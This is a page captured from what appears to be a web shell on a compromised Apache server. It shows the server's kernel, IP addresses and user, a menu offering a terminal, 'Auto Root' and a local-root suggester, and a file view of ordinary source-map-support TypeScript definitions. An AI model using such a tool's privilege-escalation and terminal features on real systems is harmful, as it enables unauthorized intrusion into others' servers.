Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
source-map-support /
Delete
Unzip
Name
Size
Permission
Date
Action
index.d.ts
1.73
KB
-rw-r--r--
2021-11-23 08:10
package.json
762
B
-rw-r--r--
2021-11-23 08:10
register-hook-require.js
44
B
-rw-r--r--
2021-11-23 08:10
register.js
25
B
-rw-r--r--
2021-11-23 08:10
source-map-support.js
19.74
KB
-rw-r--r--
2021-11-23 08:10
Save
Rename
// Type definitions for source-map-support 0.5 // Project: https://github.com/evanw/node-source-map-support // Definitions by: Bart van der Schoor <https://github.com/Bartvds> // Jason Cheatham <https://github.com/jason0x43> // Alcedo Nathaniel De Guzman Jr <https://github.com/natealcedo> // Griffin Yourick <https://github.com/tough-griff> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped import { RawSourceMap } from 'source-map'; /** * Output of retrieveSourceMap(). * From source-map-support: * The map field may be either a string or the parsed JSON object (i.e., * it must be a valid argument to the SourceMapConsumer constructor). */ export interface UrlAndMap { url: string; map: string | RawSourceMap; } /** * Options to install(). */ export interface Options { handleUncaughtExceptions?: boolean; hookRequire?: boolean; emptyCacheBetweenOperations?: boolean; environment?: 'auto' | 'browser' | 'node'; overrideRetrieveFile?: boolean; overrideRetrieveSourceMap?: boolean; retrieveFile?(path: string): string; retrieveSourceMap?(source: string): UrlAndMap | null; } export interface Position { source: string; line: number; column: number; } export function wrapCallSite(frame: any /* StackFrame */): any /* StackFrame */; export function getErrorSource(error: Error): string | null; export function mapSourcePosition(position: Position): Position; export function retrieveSourceMap(source: string): UrlAndMap | null; export function resetRetrieveHandlers(): void; /** * Install SourceMap support. * @param options Can be used to e.g. disable uncaughtException handler. */ export function install(options?: Options): void;